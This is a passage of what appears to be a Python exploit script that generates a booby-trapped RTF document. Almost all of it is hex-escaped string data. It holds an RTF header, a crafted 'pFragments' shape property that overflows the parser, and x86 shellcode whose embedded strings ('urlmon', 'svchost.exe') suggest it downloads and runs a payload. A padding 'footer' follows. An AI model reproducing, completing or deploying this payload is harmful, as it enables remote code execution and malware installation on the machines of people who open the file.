"\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65" "\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x30\x3B\x0D\x0A\x5C\x72\x65" "\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C" "\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64\x31\x39\x32\x5C\x67\x72" "\x65\x65\x6E\x31\x39\x32\x5C\x62\x6C\x75\x65\x31\x39\x32\x3B\x7D" "\x7B\x5C\x73\x74\x79\x6C\x65\x73\x68\x65\x65\x74\x7B\x5C\x71\x6A" "\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C\x6E\x6F\x77\x69\x64\x63" "\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C" "\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75" "\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72" "\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69" "\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32\x34\x5C\x61\x6C\x61\x6E" "\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C\x6C\x61\x6E\x67\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x5C\x6B\x65" "\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63\x68\x5C\x66\x30\x5C\x68" "\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63\x68\x5C\x61\x66\x31" "\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C\x61\x6E\x67\x6E\x70\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x6E\x70\x32\x30\x35\x32\x20" "\x5C\x73\x6E\x65\x78\x74\x30\x20\x4E\x6F\x72\x6D\x61\x6C\x3B\x7D" "\x7B\x5C\x2A\x5C\x63\x73\x31\x30\x20\x5C\x61\x64\x64\x69\x74\x69" "\x76\x65\x20\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20" "\x44\x65\x66\x61\x75\x6C\x74\x20\x50\x61\x72\x61\x67\x72\x61\x70" "\x68\x20\x46\x6F\x6E\x74\x3B\x7D\x7B\x5C\x2A\x0D\x0A\x5C\x74\x73" "\x31\x31\x5C\x74\x73\x72\x6F\x77\x64\x5C\x74\x72\x66\x74\x73\x57" "\x69\x64\x74\x68\x42\x33\x5C\x74\x72\x70\x61\x64\x64\x6C\x31\x30" "\x38\x5C\x74\x72\x70\x61\x64\x64\x72\x31\x30\x38\x5C\x74\x72\x70" "\x61\x64\x64\x66\x6C\x33\x5C\x74\x72\x70\x61\x64\x64\x66\x74\x33" "\x5C\x74\x72\x70\x61\x64\x64\x66\x62\x33\x5C\x74\x72\x70\x61\x64" "\x64\x66\x72\x33\x5C\x74\x72\x63\x62\x70\x61\x74\x31\x5C\x74\x72" "\x63\x66\x70\x61\x74\x31\x5C\x74\x62\x6C\x69\x6E\x64\x30\x5C\x74" "\x62\x6C\x69\x6E\x64\x74\x79\x70\x65\x33\x5C\x74\x73\x63\x65\x6C" "\x6C\x77\x69\x64\x74\x68\x66\x74\x73\x30\x5C\x74\x73\x76\x65\x72" "\x74\x61\x6C\x74\x5C\x74\x73\x62\x72\x64\x72\x74\x5C\x74\x73\x62" "\x72\x64\x72\x6C\x5C\x74\x73\x62\x72\x64\x72\x62\x5C\x74\x73\x62" "\x72\x64\x72\x72\x5C\x74\x73\x62\x72\x64\x72\x64\x67\x6C\x5C\x74" "\x73\x62\x72\x64\x72\x64\x67\x72\x5C\x74\x73\x62\x72\x64\x72\x68" "\x5C\x74\x73\x62\x72\x64\x72\x76\x20\x0D\x0A\x5C\x71\x6C\x20\x5C" "\x6C\x69\x30\x5C\x72\x69\x30\x5C\x77\x69\x64\x63\x74\x6C\x70\x61" "\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73" "\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61" "\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74" "\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30" "\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66" "\x30\x5C\x61\x66\x73\x32\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66" "\x63\x73\x30\x20\x5C\x66\x73\x32\x30\x5C\x6C\x61\x6E\x67\x31\x30" "\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65\x31\x30\x32\x34\x5C\x6C\x6F" "\x63\x68\x5C\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x31\x30\x32\x34\x20\x5C\x73\x6E\x65\x78\x74\x31\x31\x20" "\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20\x4E\x6F\x72" "\x6D\x61\x6C\x20\x54\x61\x62\x6C\x65\x3B\x7D\x7D\x0D\x0A\x7B\x5C" "\x2A\x5C\x6C\x61\x74\x65\x6E\x74\x73\x74\x79\x6C\x65\x73\x5C\x6C" "\x73\x64\x73\x74\x69\x6D\x61\x78\x31\x35\x36\x5C\x6C\x73\x64\x6C" "\x6F\x63\x6B\x65\x64\x64\x65\x66\x30\x7D\x7B\x5C\x2A\x5C\x72\x73" "\x69\x64\x74\x62\x6C\x20\x5C\x72\x73\x69\x64\x31\x35\x38\x30\x37" "\x35\x31\x39\x7D\x7B\x5C\x2A\x5C\x67\x65\x6E\x65\x72\x61\x74\x6F" "\x72\x20\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x57\x6F\x72\x64" "\x20\x31\x31\x2E\x30\x2E\x30\x30\x30\x30\x3B\x7D\x7B\x5C\x69\x6E" "\x66\x6F\x7B\x5C\x74\x69\x74\x6C\x65\x20\x46\x66\x66\x66\x66\x66" "\x66\x66\x66\x7D\x7B\x5C\x61\x75\x74\x68\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x6F\x70\x65\x72\x61\x74\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x63\x72\x65\x61\x74\x69\x6D\x5C\x79\x72\x32\x30" "\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C\x68\x72\x31\x34" "\x5C\x6D\x69\x6E\x35\x30\x7D\x7B\x5C\x72\x65\x76\x74\x69\x6D\x5C" "\x79\x72\x32\x30\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C" "\x68\x72\x31\x34\x5C\x6D\x69\x6E\x35\x31\x7D\x7B\x5C\x76\x65\x72" "\x73\x69\x6F\x6E\x31\x7D\x0D\x0A\x7B\x5C\x65\x64\x6D\x69\x6E\x73" "\x31\x7D\x7B\x5C\x6E\x6F\x66\x70\x61\x67\x65\x73\x31\x7D\x7B\x5C" "\x6E\x6F\x66\x77\x6F\x72\x64\x73\x31\x7D\x7B\x5C\x6E\x6F\x66\x63" "\x68\x61\x72\x73\x39\x7D\x7B\x5C\x2A\x5C\x63\x6F\x6D\x70\x61\x6E" "\x79\x20\x43\x48\x49\x4E\x41\x7D\x7B\x5C\x6E\x6F\x66\x63\x68\x61" "\x72\x73\x77\x73\x39\x7D\x7B\x5C\x76\x65\x72\x6E\x32\x34\x36\x31" "\x33\x7D\x7B\x5C\x2A\x5C\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x30" "\x30\x30\x30\x30\x30\x30\x30\x7D\x7D\x7B\x5C\x2A\x5C\x78\x6D\x6C" "\x6E\x73\x74\x62\x6C\x20\x7B\x5C\x78\x6D\x6C\x6E\x73\x31\x20\x68" "\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x6D\x69" "\x63\x72\x6F\x73\x6F\x66\x74\x2E\x63\x6F\x6D\x2F\x6F\x66\x66\x69" "\x63\x65\x2F\x77\x6F\x72\x64\x2F\x32\x30\x30\x33\x2F\x77\x6F\x72" "\x64\x6D\x6C\x7D\x7D\x0D\x0A\x5C\x70\x61\x70\x65\x72\x77\x31\x31" "\x39\x30\x36\x5C\x70\x61\x70\x65\x72\x68\x31\x36\x38\x33\x38\x5C" "\x6D\x61\x72\x67\x6C\x31\x38\x30\x30\x5C\x6D\x61\x72\x67\x72\x31" "\x38\x30\x30\x5C\x6D\x61\x72\x67\x74\x31\x34\x34\x30\x5C\x6D\x61" "\x72\x67\x62\x31\x34\x34\x30\x5C\x67\x75\x74\x74\x65\x72\x30\x5C" "\x6C\x74\x72\x73\x65\x63\x74\x20\x0D\x0A\x5C\x64\x65\x66\x74\x61" "\x62\x34\x32\x30\x5C\x66\x74\x6E\x62\x6A\x5C\x61\x65\x6E\x64\x64" "\x6F\x63\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64\x73\x79\x73" "\x66\x6F\x6E\x74\x31\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64" "\x6C\x69\x6E\x67\x64\x61\x74\x61\x30\x5C\x67\x72\x66\x64\x6F\x63" "\x65\x76\x65\x6E\x74\x73\x30\x5C\x76\x61\x6C\x69\x64\x61\x74\x65" "\x78\x6D\x6C\x31\x5C\x73\x68\x6F\x77\x70\x6C\x61\x63\x65\x68\x6F" "\x6C\x64\x74\x65\x78\x74\x30\x5C\x69\x67\x6E\x6F\x72\x65\x6D\x69" "\x78\x65\x64\x63\x6F\x6E\x74\x65\x6E\x74\x30\x5C\x73\x61\x76\x65" "\x69\x6E\x76\x61\x6C\x69\x64\x78\x6D\x6C\x30\x5C\x73\x68\x6F\x77" "\x78\x6D\x6C\x65\x72\x72\x6F\x72\x73\x31\x5C\x66\x6F\x72\x6D\x73" "\x68\x61\x64\x65\x5C\x68\x6F\x72\x7A\x64\x6F\x63\x5C\x64\x67\x6D" "\x61\x72\x67\x69\x6E\x5C\x64\x67\x68\x73\x70\x61\x63\x65\x31\x38" "\x30\x5C\x64\x67\x76\x73\x70\x61\x63\x65\x31\x35\x36\x5C\x64\x67" "\x68\x6F\x72\x69\x67\x69\x6E\x31\x38\x30\x30\x5C\x64\x67\x76\x6F" "\x72\x69\x67\x69\x6E\x31\x34\x34\x30\x5C\x64\x67\x68\x73\x68\x6F" "\x77\x30\x0D\x0A\x5C\x64\x67\x76\x73\x68\x6F\x77\x32\x5C\x6A\x63" "\x6F\x6D\x70\x72\x65\x73\x73\x5C\x6C\x6E\x6F\x6E\x67\x72\x69\x64" "\x5C\x76\x69\x65\x77\x6B\x69\x6E\x64\x31\x5C\x76\x69\x65\x77\x73" "\x63\x61\x6C\x65\x31\x30\x30\x5C\x73\x70\x6C\x79\x74\x77\x6E\x69" "\x6E\x65\x5C\x66\x74\x6E\x6C\x79\x74\x77\x6E\x69\x6E\x65\x5C\x68" "\x74\x6D\x61\x75\x74\x73\x70\x5C\x75\x73\x65\x6C\x74\x62\x61\x6C" "\x6E\x5C\x61\x6C\x6E\x74\x62\x6C\x69\x6E\x64\x5C\x6C\x79\x74\x63" "\x61\x6C\x63\x74\x62\x6C\x77\x64\x5C\x6C\x79\x74\x74\x62\x6C\x72" "\x74\x67\x72\x5C\x6C\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x6E\x6F" "\x62\x72\x6B\x77\x72\x70\x74\x62\x6C\x5C\x76\x69\x65\x77\x6E\x6F" "\x62\x6F\x75\x6E\x64\x31\x5C\x73\x6E\x61\x70\x74\x6F\x67\x72\x69" "\x64\x69\x6E\x63\x65\x6C\x6C\x5C\x61\x6C\x6C\x6F\x77\x66\x69\x65" "\x6C\x64\x65\x6E\x64\x73\x65\x6C\x5C\x77\x72\x70\x70\x75\x6E\x63" "\x74\x5C\x61\x73\x69\x61\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x72" "\x73\x69\x64\x72\x6F\x6F\x74\x31\x35\x38\x30\x37\x35\x31\x39\x0D" "\x0A\x5C\x6E\x65\x77\x74\x62\x6C\x73\x74\x79\x72\x75\x6C\x73\x5C" "\x6E\x6F\x67\x72\x6F\x77\x61\x75\x74\x6F\x66\x69\x74\x20\x7B\x5C" "\x2A\x5C\x66\x63\x68\x61\x72\x73\x20\x0D\x0A\x21\x29\x2C\x2E\x3A" "\x5C\x27\x33\x62\x3F\x5D\x5C\x27\x37\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x37\x5C\x27\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27" "\x61\x36\x5C\x27\x61\x31\x5C\x27\x61\x35\x5C\x27\x61\x38\x5C\x27" "\x34\x34\x5C\x27\x61\x31\x5C\x27\x61\x63\x5C\x27\x61\x31\x5C\x27" "\x61\x66\x5C\x27\x61\x31\x5C\x27\x62\x31\x5C\x27\x61\x31\x5C\x27" "\x61\x64\x5C\x27\x61\x31\x5C\x27\x63\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x32\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x38\x5C\x27\x61\x31\x5C\x27\x61\x39\x5C\x27\x61\x31\x5C\x27" "\x62\x35\x5C\x27\x61\x31\x5C\x27\x62\x37\x5C\x27\x61\x31\x5C\x27" "\x62\x39\x5C\x27\x61\x31\x5C\x27\x62\x62\x5C\x27\x61\x31\x5C\x27" "\x62\x66\x5C\x27\x61\x31\x5C\x27\x62\x33\x5C\x27\x61\x31\x5C\x27" "\x62\x64\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27" "\x61\x32\x5C\x27\x61\x33\x5C\x27\x61\x37\x5C\x27\x61\x33\x5C\x27" "\x61\x39\x5C\x27\x61\x33\x5C\x27\x61\x63\x5C\x27\x61\x33\x5C\x27" "\x61\x65\x5C\x27\x61\x33\x5C\x27\x62\x61\x5C\x27\x61\x33\x5C\x27" "\x62\x62\x5C\x27\x61\x33\x5C\x27\x62\x66\x5C\x27\x61\x33\x5C\x27" "\x64\x64\x5C\x27\x61\x33\x5C\x27\x65\x30\x5C\x27\x61\x33\x5C\x27" "\x66\x63\x5C\x27\x61\x33\x5C\x27\x66\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x62\x5C\x27\x61\x31\x5C\x27\x65\x39\x0D\x0A\x7D\x7B\x5C\x2A" "\x5C\x6C\x63\x68\x61\x72\x73\x20\x28\x5B\x5C\x27\x37\x62\x5C\x27" "\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27\x61\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x30\x5C\x27\x61\x31\x5C\x27\x62\x34\x5C\x27" "\x61\x31\x5C\x27\x62\x36\x5C\x27\x61\x31\x5C\x27\x62\x38\x5C\x27" "\x61\x31\x5C\x27\x62\x61\x5C\x27\x61\x31\x5C\x27\x62\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x32\x5C\x27\x61\x31\x5C\x27\x62\x63\x5C\x27" "\x61\x33\x5C\x27\x61\x38\x5C\x27\x61\x33\x5C\x27\x61\x65\x5C\x27" "\x61\x33\x5C\x27\x64\x62\x5C\x27\x61\x33\x5C\x27\x66\x62\x5C\x27" "\x61\x31\x5C\x27\x65\x61\x5C\x27\x61\x33\x5C\x27\x61\x34\x7D\x5C" "\x66\x65\x74\x30\x7B\x5C\x2A\x5C\x77\x67\x72\x66\x66\x6D\x74\x66" "\x69\x6C\x74\x65\x72\x20\x30\x31\x33\x66\x7D\x5C\x69\x6C\x66\x6F" "\x6D\x61\x63\x61\x74\x63\x6C\x6E\x75\x70\x30\x5C\x6C\x74\x72\x70" "\x61\x72\x20\x5C\x73\x65\x63\x74\x64\x20\x5C\x6C\x74\x72\x73\x65" "\x63\x74\x0D\x0A\x5C\x6C\x69\x6E\x65\x78\x30\x5C\x68\x65\x61\x64" "\x65\x72\x79\x38\x35\x31\x5C\x66\x6F\x6F\x74\x65\x72\x79\x39\x39" "\x32\x5C\x63\x6F\x6C\x73\x78\x34\x32\x35\x5C\x65\x6E\x64\x6E\x68" "\x65\x72\x65\x5C\x73\x65\x63\x74\x6C\x69\x6E\x65\x67\x72\x69\x64" "\x33\x31\x32\x5C\x73\x65\x63\x74\x73\x70\x65\x63\x69\x66\x79\x6C" "\x5C\x73\x66\x74\x6E\x62\x6A\x20\x7B\x5C\x2A\x5C\x70\x6E\x73\x65" "\x63\x6C\x76\x6C\x31\x5C\x70\x6E\x75\x63\x72\x6D\x5C\x70\x6E\x73" "\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32" "\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74" "\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70" "\x6E\x73\x65\x63\x6C\x76\x6C\x32\x5C\x70\x6E\x75\x63\x6C\x74\x72" "\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65" "\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70" "\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B" "\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x33\x0D\x0A\x5C\x70" "\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E" "\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67" "\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20" "\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x34" "\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61\x72\x74" "\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E" "\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64" "\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63" "\x6C\x76\x6C\x35\x5C\x70\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x36\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C" "\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E" "\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C" "\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B" "\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D" "\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x37\x5C\x70" "\x6E\x6C\x63\x72\x6D\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70" "\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E" "\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68" "\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63" "\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76" "\x6C\x38\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x39\x5C\x70\x6E\x6C\x63\x72\x6D\x5C\x70" "\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74" "\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C\x70" "\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C" "\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D" "\x5C\x70\x61\x72\x64\x5C\x70\x6C\x61\x69\x6E\x20\x5C\x6C\x74\x72" "\x70\x61\x72\x5C\x71\x6A\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C" "\x6E\x6F\x77\x69\x64\x63\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70" "\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61" "\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61" "\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C" "\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63" "\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32" "\x34\x5C\x61\x6C\x61\x6E\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72" "\x63\x68\x5C\x66\x63\x73\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C" "\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32" "\x30\x35\x32\x5C\x6B\x65\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63" "\x68\x5C\x61\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x32\x30\x35\x32\x20\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66" "\x63\x73\x31\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C" "\x66\x63\x73\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38" "\x30\x37\x35\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C" "\x64\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x5C\x66" "\x30\x20\x46\x7D\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38\x30\x37\x35" "\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63" "\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x7D\x7B\x5C\x73\x68" "\x70\x7B\x5C\x73\x70\x7B\x5C\x73\x6E\x31\x09\x70\x66\x52\x61\x47" "\x4D\x65\x4E\x54\x73\x7D\x7B\x5C\x73\x76\x20\x31\x3B\x31\x3B\x30" "\x31\x31\x31\x31\x31\x31\x31\x66\x66\x30\x33\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x32\x66\x39\x30\x39\x33\x37\x38\x30\x30\x30\x30\x38" "\x30\x37\x63\x30\x30\x30\x30\x38\x30\x37\x63\x42\x42\x42\x42\x42" "\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44" "\x44\x44\x44\x39\x30\x39\x30\x65\x62\x37\x31\x33\x31\x63\x39\x36" "\x34\x38\x62\x37\x31\x33\x30\x38\x62\x37\x36\x30\x63\x38\x62\x37" "\x36\x31\x63\x38\x62\x35\x65\x30\x38\x38\x62\x37\x65\x32\x30\x38" "\x62\x33\x36\x36\x36\x33\x39\x34\x66\x31\x38\x37\x35\x66\x32\x63" "\x33\x36\x30\x38\x62\x36\x63\x32\x34\x32\x34\x38\x62\x34\x35\x33" "\x63\x38\x62\x35\x34\x32\x38\x37\x38\x30\x31\x65\x61\x38\x62\x34" "\x61\x31\x38\x38\x62\x35\x61\x32\x30\x30\x31\x65\x62\x65\x33\x33" "\x34\x34\x39\x38\x62\x33\x34\x38\x62\x30\x31\x65\x65\x33\x31\x66" "\x66\x33\x31\x63\x30\x66\x63\x61\x63\x38\x34\x63\x30\x37\x34\x30" "\x37\x63\x31\x63\x66\x30\x64\x30\x31\x63\x37\x65\x62\x66\x34\x33" "\x62\x37\x63\x32\x34\x32\x38\x37\x35\x65\x31\x38\x62\x35\x61\x32" "\x34\x30\x31\x65\x62\x36\x36\x38\x62\x30\x63\x34\x62\x38\x62\x35" "\x61\x31\x63\x30\x31\x65\x62\x38\x62\x30\x34\x38\x62\x30\x31\x65" "\x38\x38\x39\x34\x34\x32\x34\x31\x63\x36\x31\x63\x33\x65\x38\x39" "\x32\x66\x66\x66\x66\x66\x66\x35\x64\x65\x62\x30\x35\x65\x38\x66" "\x33\x66\x66\x66\x66\x66\x66\x38\x39\x65\x66\x38\x33\x65\x66\x38" "\x39\x38\x39\x65\x65\x38\x33\x65\x65\x39\x35\x38\x31\x65\x64\x34" "\x35\x66\x66\x66\x66\x66\x66\x36\x38\x33\x33\x63\x61\x38\x61\x35" "\x62\x35\x33\x65\x38\x38\x61\x66\x66\x66\x66\x66\x66\x35\x35\x36" "\x61\x36\x34\x66\x66\x64\x30\x35\x37\x38\x39\x63\x37\x30\x31\x65" "\x66\x61\x34\x38\x30\x37\x66\x66\x66\x30\x30\x37\x35\x66\x39\x35" "\x66\x36\x38\x38\x65\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x36" "\x64\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36" "\x66\x36\x65\x35\x31\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35" "\x34\x66\x66\x64\x30\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35" "\x30\x65\x38\x35\x33\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35" "\x31\x35\x31\x35\x35\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38\x39" "\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x33\x66\x66\x66\x66" "\x66\x66\x66\x34\x31\x35\x31\x35\x35\x66\x66\x64\x30\x37\x33\x37" "\x36\x36\x33\x36\x38\x36\x66\x37\x33\x37\x34\x32\x65\x36\x35\x37" "\x38\x36\x35\x30\x30") footer =("\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" 